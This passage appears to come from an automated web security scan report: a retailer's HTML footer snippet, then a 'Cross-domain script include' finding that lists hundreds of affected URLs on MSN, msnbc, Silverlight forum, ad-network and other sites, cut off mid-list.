src="http://images.highspeedbackbone.net/footer/country_icons_25.gif" alt="Misco Italy Computers Suppliers S.p.A" width="32" height="27" border="0" /></a><a href="http://www.misco.fr"><img src="http://images.highspeedbackbone.net/footer/country_icons_26.gif" alt="Misco France" width="33" height="27" border="0" /></a><a href="http://www.misco.be"><img src="http://images.highspeedbackbone.net/footer/country_icons_27.gif" alt="Misco Belgium" width="35" height="27" border="0" /></a><a href="http://www.misco.nl"><img src="http://images.highspeedbackbone.net/footer/country_icons_28.jpg" alt="Misco Nederland BV" width="34" height="27" border="0" /></a><a href="http://www.misco.se"><img src="http://images.highspeedbackbone.net/footer/country_icons_29.gif" alt="Misco AB - Sweden" width="36" height="27" border="0" /></a><a href="http://www.misco.es"><img src="http://images.highspeedbackbone.net/footer/country_icons_30.gif" alt="Misco Iberia Computer Supplier SA - Madrid, Spain" width="35" height="27" border="0" /></a><a href="http://www.misco.pt"><img src="http://images.highspeedbackbone.net/footer/country_icons_31.gif" alt="Misco Iberia Computer Supplier SA - Madrid, Spain" width="36" height="27" border="0" /></a>
...[SNIP]...
<br /><a href="http://www.systemax.com/" target="_blank"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/systemax.jpg" alt="Systemax" Title="Systemax"></a>
                   <a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.TIGERDIRECT.COM&lang=en" target="_blank"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/verisign.gif" alt="VeriSign Secured" Title="VeriSign Secured"></a>

<a href="http://www.seflorida.bbb.org/BusinessReport.aspx?CompanyID=27000500&source=ctc" target="_blank"><img src="http://images.highspeedbackbone.net/footerus/clickratingsm.gif" WIDTH="135" HEIGHT="52" BORDER="0"></a>

<a href="https://sealserver.trustkeeper.net/compliance/cert.php?code=ea97a8b6d8d755f41b78d04aa242d7f1&style=normal&size=105x54&language=en" target="hATW"><img src="http://images.highspeedbackbone.net/footerus/Newfooter/trustwave_logo.gif" border="0" alt="Trusted Commerce" Title="Trusted Commerce"/></a>
                   <a href="http://www.bizrateinsights.com/2010-coe" target="_blank"><img src="http://images.highspeedbackbone.net/footer/BR_2010.gif" alt="Bizrate" title="Bizrate" /></a>
<img src="http://images.highspeedbackbone.net/footer/paypal_logo.gif" alt="PayPal" title="Shop Using PayPal" />
</div>
...[SNIP]...
</Script>

<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

23. Cross-domain script include previous next
There are 662 instances of this issue:

http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6
http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5
http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8
http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8
http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7
http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159
http://ad.doubleclick.net/adi/N4319.msn/B2087123.383
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4
http://alex-johnson.newsvine.com/
http://analytics.live.com/Sync.html
http://analytics.microsoft.com/Sync.html
http://analytics.redacted/Include.html
http://analytics.redacted/sync.html
http://assets.tumblr.com/iframe.html
http://astrocenter.astrology.redacted/msn/Default.aspx
http://athima-chansanchai.newsvine.com/
http://autos.redacted/
http://autos.redacted/research/compare/compare.aspx
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90
http://bassistance.de/jquery-plugins/jquery-plugin-validation/
http://blogs.discovermagazine.com/badastronomy/
http://blogs.discovermagazine.com/cosmicvariance/
http://blogs.discovermagazine.com/loom/
http://blogs.msdn.com/b/delay/archive/2011/01/27/sudo-localize-amp-amp-make-me-a-sandwich-free-pseudolocalizer-class-makes-it-easy-for-anyone-to-identify-potential-localization-issues-in-net-applications.aspx
http://blogs.nature.com/news/thegreatbeyond/
http://bodyodd.msnbc.redacted/
http://boyle.newsvine.com/
http://cartoonblog.msnbc.redacted/
http://cartoonblog.msnbc.redacted/
http://channel9.msdn.com/
http://college.scout.com/
http://collegebasketball.scout.com/
http://collegefootball.scout.com/
http://content.scout.com/a.z
http://cosmiclog.msnbc.redacted/
http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/
http://curmudgeons.blogspot.com/
http://dating.redacted/cp.aspx
http://dating.redacted/en-us/partner/msn/38028.html
http://dating.redacted/index.aspx
http://dating.redacted/search/index.aspx
http://digg.com/search
http://docs.jquery.com/Plugins/Validation
http://docs.jquery.com/UI
http://docs.jquery.com/UI/Effects/
http://docs.jquery.com/UI/Effects/Blind
http://docs.jquery.com/UI/Tabs
http://earthsky.org/
http://editorial.autos.redacted/article.aspx
http://editorial.autos.redacted/slideshow.aspx
http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html
http://entertainment.redacted/
http://entertainment.redacted/news/
http://entertainment.redacted/video/
http://eurekalert.org/
http://expression.microsoft.com/en-us/cc136530.aspx
http://fancybox.net/
http://fitbie.redacted/
http://fitbie.redacted/eat-right/tips/stock-your-refrigerator-weight-loss
http://forums.silverlight.net/
http://forums.silverlight.net/adchain.html
http://forums.silverlight.net/default.aspx
http://forums.silverlight.net/forums/13.aspx
http://forums.silverlight.net/forums/14.aspx
http://forums.silverlight.net/forums/15.aspx
http://forums.silverlight.net/forums/16.aspx
http://forums.silverlight.net/forums/17.aspx
http://forums.silverlight.net/forums/18.aspx
http://forums.silverlight.net/forums/19.aspx
http://forums.silverlight.net/forums/20.aspx
http://forums.silverlight.net/forums/21.aspx
http://forums.silverlight.net/forums/25.aspx
http://forums.silverlight.net/forums/28.aspx
http://forums.silverlight.net/forums/35.aspx
http://forums.silverlight.net/forums/46.aspx
http://forums.silverlight.net/forums/51.aspx
http://forums.silverlight.net/forums/52.aspx
http://forums.silverlight.net/forums/53.aspx
http://forums.silverlight.net/forums/56.aspx
http://forums.silverlight.net/forums/59.aspx
http://forums.silverlight.net/forums/63.aspx
http://forums.silverlight.net/forums/64.aspx
http://forums.silverlight.net/forums/65.aspx
http://forums.silverlight.net/forums/66.aspx
http://forums.silverlight.net/forums/67.aspx
http://forums.silverlight.net/forums/68.aspx
http://forums.silverlight.net/forums/TopicsNotAnswered.aspx
http://forums.silverlight.net/forums/p/217026/518297.aspx
http://forums.silverlight.net/forums/p/217498/518305.aspx
http://forums.silverlight.net/forums/p/217562/518302.aspx
http://forums.silverlight.net/forums/p/217667/518301.aspx
http://forums.silverlight.net/forums/p/217709/518306.aspx
http://forums.silverlight.net/forums/p/217710/518307.aspx
http://forums.silverlight.net/forums/p/217719/518310.aspx
http://forums.silverlight.net/forums/p/217724/518300.aspx
http://forums.silverlight.net/forums/p/217726/518308.aspx
http://forums.silverlight.net/forums/p/217727/518309.aspx
http://forums.silverlight.net/forums/t/217026.aspx
http://forums.silverlight.net/forums/t/217498.aspx
http://forums.silverlight.net/forums/t/217562.aspx
http://forums.silverlight.net/forums/t/217667.aspx
http://forums.silverlight.net/forums/t/217709.aspx
http://forums.silverlight.net/forums/t/217710.aspx
http://forums.silverlight.net/forums/t/217719.aspx
http://forums.silverlight.net/forums/t/217724.aspx
http://forums.silverlight.net/forums/t/217726.aspx
http://forums.silverlight.net/forums/t/217727.aspx
http://forums.silverlight.net/forums/topicsactive.aspx
http://forums.silverlight.net/forums/viewall.aspx
http://forums.silverlight.net/search/
http://forums.silverlight.net/user/viewonline.aspx
http://games.redacted/
http://glo.redacted/
http://health.redacted/
http://helenaspopkin.newsvine.com/
http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
http://ingame.msnbc.redacted/
http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy
http://insidemsn.wordpress.com/
http://investing.money.redacted/investments/charts
http://investing.money.redacted/investments/currency-exchange-rates/
http://investing.money.redacted/investments/market-index/
http://investing.money.redacted/investments/market-summary
http://investing.money.redacted/investments/stock-price
http://investing.money.redacted/investments/stock-price/
http://javascript.nwbox.com/IEContentLoaded/
http://jcfootball.scout.com/
http://jquery.com/
http://jquery.org/license
http://jqueryui.com/about
http://latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video
http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never
http://lifestyle.redacted/
http://lifestyle.redacted/relationships/
http://lifestyle.redacted/relationships/staticslideshowglamour.aspx
http://lifestyle.redacted/your-home/
http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx
http://lifestyle.redacted/your-life/family-parenting/article.aspx
http://lifestyle.redacted/your-life/your-money-today/article.aspx
http://lifestyle.redacted/your-life/your-money-today/video.aspx
http://lifestyle.redacted/your-look/
http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx
http://lifestyle.redacted/your-look/video/
http://live.newsvine.com/
http://login.live.com/login.srf
http://malsup.com/jquery/cycle/lite/
http://michaelwann.newsvine.com/
http://mlb.scout.com/
http://money.redacted/
http://money.redacted//
http://money.redacted/auto-insurance/article.aspx
http://money.redacted/budgeting-savings
http://money.redacted/business-news
http://money.redacted/business-news/article.aspx
http://money.redacted/business-news/news.aspx
http://money.redacted/common/commentary.aspx
http://money.redacted/common/finding-your-way-on-msn-money.aspx
http://money.redacted/common/sitemap.aspx
http://money.redacted/common/welcome-to-the-new-msn-money.aspx
http://money.redacted/credit-and-debt
http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx
http://money.redacted/currency/2011-the-year-of-wild-speculation-fleckenstein.aspx
http://money.redacted/currency/currency-clash-dollar-vs-euro-smartmoney.aspx
http://money.redacted/exchange-traded-fund
http://money.redacted/exchange-traded-fund/the-case-for-actively-managed-ETFs.aspx
http://money.redacted/how-to-invest
http://money.redacted/how-to-invest/default-dyn.aspx
http://money.redacted/how-to-invest/default.aspx
http://money.redacted/how-to-invest/how-to-invest-in-a-zigzag-economy-jubak.aspx
http://money.redacted/how-to-invest/invest-like-warren-buffett-in-2011-ap.aspx
http://money.redacted/how-to-invest/start-investing-with-just-100-dollars.aspx
http://money.redacted/how-to-invest/super-bowl-theory-says-to-go-long-marketwatch.aspx
http://money.redacted/how-to-invest/video.aspx
http://money.redacted/how-to-invest/what-you-did-not-learn-from-the-crash-weston.aspx
http://money.redacted/identity-theft/default-dyn.aspx
http://money.redacted/insurance
http://money.redacted/investing
http://money.redacted/investing/10-reasons-to-love-rising-prices-jubak.aspx
http://money.redacted/investing/stock-picks-to-change-your-life.aspx
http://money.redacted/loans
http://money.redacted/market-news/post.aspx
http://money.redacted/money-video
http://money.redacted/mutual-fund
http://money.redacted/mutual-fund/default-dyn.aspx
http://money.redacted/mutual-fund/when-a-401k-loan-is-a-smart-move-usnews.aspx
http://money.redacted/personal-finance
http://money.redacted/retirement
http://money.redacted/saving-money/50-30-20-budget.aspx
http://money.redacted/stock-broker
http://money.redacted/stock-broker-guided/are-investors-too-bullish-mirhaydari.aspx
http://money.redacted/stocks
http://money.redacted/taxes
http://money.redacted/top-stocks/post.aspx
http://redacted/inc/Attributions.asp
http://redacted/investor/StockRating/srsmain.asp
http://redacted/investor/StockRating/srstopstocksresults.aspx
http://redacted/investor/charts/chartdl.aspx
http://redacted/investor/market/commodities.aspx
http://redacted/investor/market/earncalendar/
http://redacted/investor/market/exchangerates.aspx
http://redacted/investor/market/treasuries.aspx
http://redacted/investor/market/usindex.aspx
http://redacted/investor/market/worldmarkets.aspx
http://redacted/investor/partsub/funds/etfperformancetracker.aspx
http://redacted/investor/partsub/funds/topfunds.asp
http://redacted/investor/quotewatchlist.asp
http://redacted/money.search
http://movies.redacted/
http://movies.redacted/academy-awards/snubs/
http://movies.redacted/jason-statham/photo-gallery/feature/
http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/
http://movies.redacted/new-on-dvd/movies/
http://movies.redacted/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/
http://movies.redacted/paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/
http://movies.redacted/the-rundown/the-guard/story_5/
http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/
http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/
http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/
http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx
http://msn.careerbuilder.com/msn/default.aspx
http://msn.chemistry.com/cp/landing/44762
http://msn.chemistry.com/cp/landing/57269
http://msn.foxsports.com/
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/collegebasketball/scores
http://msn.foxsports.com/collegefootball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf/leaderboard
http://msn.foxsports.com/mlb
http://msn.foxsports.com/mlb/story/Orioles-hope-to-add-Guerrero-to-revamped-roster-83871116
http://msn.foxsports.com/mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420
http://msn.foxsports.com/mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911
http://msn.foxsports.com/nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911
http://msn.foxsports.com/nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911
http://msn.foxsports.com/nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/
http://msn.foxsports.com/olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911
http://msn.foxsports.com/video
http://msn.whitepages.com/
http://music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video
http://music.redacted/
http://nbcsports.msnbc.com/
http://nbcsports.msnbc.com/id/41322933/ns/sports-super_bowl_xlv/
http://nbcsports.msnbc.com/id/41323678/ns/sports-tennis/
http://nbcsports.msnbc.com/id/41325676/ns/sports-tennis/
http://nbcsports.msnbc.com/id/41326839/ns/sports-college_basketball/
http://nbcsports.msnbc.com/id/41328610/ns/sports-college_basketball/
http://netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video
http://news.discovery.com/
http://news.sciencemag.org/scienceinsider/
http://news.ycombinator.com/newest
http://news.ycombinator.com/news
http://oasc03049.popsci.com/RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05
http://oascentral.scientificamerican.com/RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41
http://openchannel.msnbc.redacted/
http://photoblog.msnbc.redacted/
http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun
http://photoblog.msnbc.redacted/_vine/a
http://planetary.org/blog
http://polls.newsvine.com/
http://preps.scout.com/
http://profootball.scout.com/
http://progolftalk.nbcsports.com/2011/01/29/tiger-woods-shoots-74-in-farmers-third-round/related
http://progolftalk.nbcsports.com/2011/01/29/tiger-woods-shoots-74-in-farmers-third-round/related
http://progolftalk.nbcsports.com/2011/01/29/tour-stop-mickelson-haas-share-farmers-lead-with-watson-mahan-one-back/related
http://progolftalk.nbcsports.com/2011/01/29/tour-stop-mickelson-haas-share-farmers-lead-with-watson-mahan-one-back/related
http://realestate.redacted/
http://realestate.redacted/article.aspx
http://realestate.redacted/slideshow.aspx
http://recruiting.scout.com/
http://recruiting.scout.com/a.z
http://redtape.msnbc.com/
http://redtape.newsvine.com/
http://rive.rs/projects/tumblr-tag-clouds
http://rss.scout.com/rss.aspx
http://science.slashdot.org/
http://scouthoops.scout.com/
https://secure.bundle.com/msn
https://secure.scout.com/a.z
https://security.live.com/LoginStage.aspx
http://seedmagazine.com/
http://social.msdn.microsoft.com/Forums/en-US/windowsphone7series/threads
http://spacefellowship.com/
http://stackoverflow.com/
http://stackoverflow.com/questions
http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
http://stackoverflow.com/tags
http://stackoverflow.com/users
http://stackoverflow.com/users/login
http://suzanne-choney.newsvine.com/
http://technolog.msnbc.redacted/
http://technolog.msnbc.redacted/_feeds/rss2/author
http://technolog.msnbc.redacted/_news/2010/08/10/4864065-motorolas-pumped-up-droid-2-ships-thursday
http://technolog.msnbc.redacted/_news/2010/08/16/4904611-north-korea-welcome-to-twitter
http://technolog.msnbc.redacted/_news/2010/08/19/4932582-cameron-diaz-most-dangerous-celeb-search-name
http://technolog.msnbc.redacted/_news/2010/08/23/4954400-apple-would-use-voice-facial-recognition-as-part-of-iphone-kill-switch
http://technolog.msnbc.redacted/_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing-
http://technolog.msnbc.redacted/_news/2010/08/26/4975799-big-facebook-sues-little-teachbook
http://technolog.msnbc.redacted/_news/2010/08/26/4977002-gmail-calling-takes-off-but-not-without-bumps
http://technolog.msnbc.redacted/_news/2010/08/27/4982716-older-adults-are-flocking-to-social-networks
http://technolog.msnbc.redacted/_news/2010/08/30/5001169-google-may-start-pay-per-view-movies-on-youtube
http://technolog.msnbc.redacted/_news/2010/08/30/5001506-nintendo-drops-dsi-and-dsi-xl-prices-20
http://technolog.msnbc.redacted/_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console
http://technolog.msnbc.redacted/_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up
http://technolog.msnbc.redacted/_news/2011/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings
http://technolog.msnbc.redacted/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink
http://technolog.msnbc.redacted/_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see
http://technolog.msnbc.redacted/_news/2011/01/28/5942012-did-spam-text-kill-a-russian-suicide-bomber
http://technolog.msnbc.redacted/_news/2011/01/28/5942345-jon-stewart-questions-egypts-twitter-revolution
http://technolog.msnbc.redacted/_news/2011/01/28/5942650-net-less-egypt-may-face-economic-doom-monday
http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore
http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/
http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/
http://technolog.msnbc.redacted/_nv/more/section/archive
http://technolog.msnbc.redacted/_vine/a
http://technolog.msnbc.redacted/amazon
http://technolog.msnbc.redacted/android
http://technolog.msnbc.redacted/angry-birds
http://technolog.msnbc.redacted/app-store
http://technolog.msnbc.redacted/apple
http://technolog.msnbc.redacted/apps
http://technolog.msnbc.redacted/at
http://technolog.msnbc.redacted/blackberry
http://technolog.msnbc.redacted/ces-2011
http://technolog.msnbc.redacted/citizen-gamer
http://technolog.msnbc.redacted/facebook
http://technolog.msnbc.redacted/featured
http://technolog.msnbc.redacted/google
http://technolog.msnbc.redacted/helen-a-s-popkin
http://technolog.msnbc.redacted/internet
http://technolog.msnbc.redacted/ipad
http://technolog.msnbc.redacted/iphone
http://technolog.msnbc.redacted/itunes
http://technolog.msnbc.redacted/justin-bieber
http://technolog.msnbc.redacted/kinect
http://technolog.msnbc.redacted/mark-zuckerberg
http://technolog.msnbc.redacted/meme
http://technolog.msnbc.redacted/microsoft
http://technolog.msnbc.redacted/motion-controls
http://technolog.msnbc.redacted/nintendo
http://technolog.msnbc.redacted/nintendo-3ds
http://technolog.msnbc.redacted/online-privacy
http://technolog.msnbc.redacted/privacy
http://technolog.msnbc.redacted/samsung
http://technolog.msnbc.redacted/science
http://technolog.msnbc.redacted/security
http://technolog.msnbc.redacted/smart-phone
http://technolog.msnbc.redacted/social-media
http://technolog.msnbc.redacted/sony
http://technolog.msnbc.redacted/steve-jobs
http://technolog.msnbc.redacted/tablets
http://technolog.msnbc.redacted/technology
http://technolog.msnbc.redacted/twitter
http://technolog.msnbc.redacted/verizon
http://technolog.msnbc.redacted/verizon-wireless
http://technolog.msnbc.redacted/video
http://technolog.msnbc.redacted/video-games
http://technolog.msnbc.redacted/viral
http://technolog.msnbc.redacted/wii
http://technolog.msnbc.redacted/wikileaks
http://technolog.msnbc.redacted/windows-phone-7
http://technolog.msnbc.redacted/xbox
http://technolog.msnbc.redacted/youtube
http://technolog2.newsvine.com/
http://thebubble.redacted/
http://theinvestedlife.redacted/
http://thelastword.msnbc.redacted/
http://timheuer.com/blog/articles/getting-started-with-silverlight-development.aspx
http://today.msnbc.redacted/
http://today.msnbc.redacted/id/37616868
http://today.msnbc.redacted/id/41319614/ns/today-entertainment/
http://toddkenreck.newsvine.com/
http://top.newsvine.com/
http://top.newsvine.com/users
http://travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video
http://trueslant.com/milesobrien/
http://tv.redacted/
http://tv.redacted/tv/article.aspx
http://twitter.com/
http://twitter.com/HelenASPopkin
http://twitter.com/MichaelWann
http://twitter.com/windabenedetti
http://twitter.com/wjrothman
http://twitter.com/wjrothman
https://twitter.com/ToddKenreck
https://twitter.com/ToddKenreck
http://video.fr.redacted/
http://video.uk.redacted/
http://redcated/CNT/iview/286609711/direct
http://redcated/CNT/iview/287065754/direct
http://redcated/NYC/iview/264935949/direct
http://visitmix.com/Labs/rosetta/eyesofblend/
http://wbenedetti.newsvine.com/
http://webreflection.blogspot.com/2007/08/global-scope-evaluation-and-dom.html
http://wonderwall.redacted/
http://wonderwall.redacted/movies/celeb-inc-for-jan-28-11106.gallery
http://wonderwall.redacted/music/chris-brown-completes-domestic-violence-program-1594072.story
http://wonderwall.redacted/tv/jaime-pressly-files-for-divorce-1594033.story
http://wonderwall.redacted/tv/locane-pleads-not-guilty-over-fatal-car-crash-1594051.story
http://wonderwall.redacted/tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery
http://www.asp.net/
http://www.bing.com/shopping/content/search
http://www.bing.com/shopping/healthy-cooking/r/151
http://www.bing.com/shopping/valentines-day-gift-ideas/r/144
http://www.bing.com/travel/
http://www.bing.com/travel/content/search
http://www.bing.com/videos/browse
http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa
http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo
http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo
http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs
http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o
http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt
http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck
http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv
http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy
http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2
http://www.bing.com/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo
http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video
http://www.bundle.com/
http://www.collectspace.com/
http://www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/
http://www.dailygrail.com/
http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/
http://www.delish.com/
http://www.delish.com/entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips
http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno
http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/
http://www.everyblock.com/
http://www.facebook.com/2008/fbml
http://www.facebook.com/HelenASPopkin
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/sharer.php
http://www.facebook.com/todd.kenreck
http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html
http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html
http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html
http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html
http://www.gatorade.com/default.aspx
https://www.google.com/adsense/support/bin/request.py
http://www.hobbyspace.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.kanoodle.com/search_spy.html
http://www.livescience.com/
http://www.merchantcircle.com/corporate/
http://www.merchantcircle.com/corporate/503.html
http://www.redacted/
http://www.redacted/defaultwpe7.aspx
http://www.redacted/sck.aspx
http://www.redacted/worldwide.aspx
http://www.msnbc.redacted/
http://www.msnbc.redacted/id/24780215/ns/technology_and_science-games
http://www.msnbc.redacted/id/26315908/vp=41321791&
http://www.msnbc.redacted/id/26613008/
http://www.msnbc.redacted/id/27365695/
http://www.msnbc.redacted/id/3032072/ns/business
http://www.msnbc.redacted/id/3032076/ns/health
http://www.msnbc.redacted/id/3032118/ns/technology_and_science
http://www.msnbc.redacted/id/3032507/ns/world_news
http://www.msnbc.redacted/id/3032525/ns/us_news
http://www.msnbc.redacted/id/3032553/ns/politics
http://www.msnbc.redacted/id/3032619/ns/nightly_news/
http://www.msnbc.redacted/id/3032619/vp/41328231
http://www.msnbc.redacted/id/3053415/
http://www.msnbc.redacted/id/3303511/
http://www.msnbc.redacted/id/3303540/
http://www.msnbc.redacted/id/37643077
http://www.msnbc.redacted/id/41164445/ns/world_news-africa/
http://www.msnbc.redacted/id/41253088/ns/technology_and_science-science
http://www.msnbc.redacted/id/41311073/ns/business-consumer_news/
http://www.msnbc.redacted/id/41316837/ns/world_news-mideastn_africa/
http://www.msnbc.redacted/id/41317259/ns/politics
http://www.msnbc.redacted/id/41317259/ns/politics
http://www.msnbc.redacted/id/41317259/ns/politics/
http://www.msnbc.redacted/id/41317259/ns/politics/
http://www.msnbc.redacted/id/41320309/ns/technology_and_science-tech_and_gadgets
http://www.msnbc.redacted/id/41321565/ns/business/
http://www.msnbc.redacted/id/41322367/ns/local_news-dallasfort_worth_tx/
http://www.msnbc.redacted/id/41322659/ns/local_news-dallasfort_worth_tx/
http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa
http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa/
http://www.msnbc.redacted/id/41324031
